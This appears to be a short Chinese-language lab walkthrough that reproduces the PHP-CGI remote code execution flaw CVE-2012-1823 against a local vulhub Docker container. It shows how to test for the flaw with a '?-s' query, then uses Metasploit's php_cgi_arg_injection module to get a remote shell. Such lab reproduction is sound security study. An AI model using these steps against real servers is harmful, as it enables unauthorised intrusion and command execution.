CVE-2012-1823漏洞复现
进入下面目录/home/kali/vulhub/php/CVE-2012-1823启动dockersudo docker-compose up -d可以看到已经启动了。在浏览器输入http://127.0.0.1:8080/可以看到正常启动了。在浏览器输入http://127.0.0.1:8080/?-s说明是有漏洞的。在控制台输入msfconsole等一会。输入search php cgi注意看第24条exploit/multi/http/php_cgi_arg_injection。执行use exploit/multi/http/php_cgi_arg_injection设置rhost , rport 查看options运行run进入shell,可以使用ls cd pwd whoami等命令。参考PHP-CGI远程代码执行漏洞CVE-2012-1823漏洞复现 - Junglezt - 博客园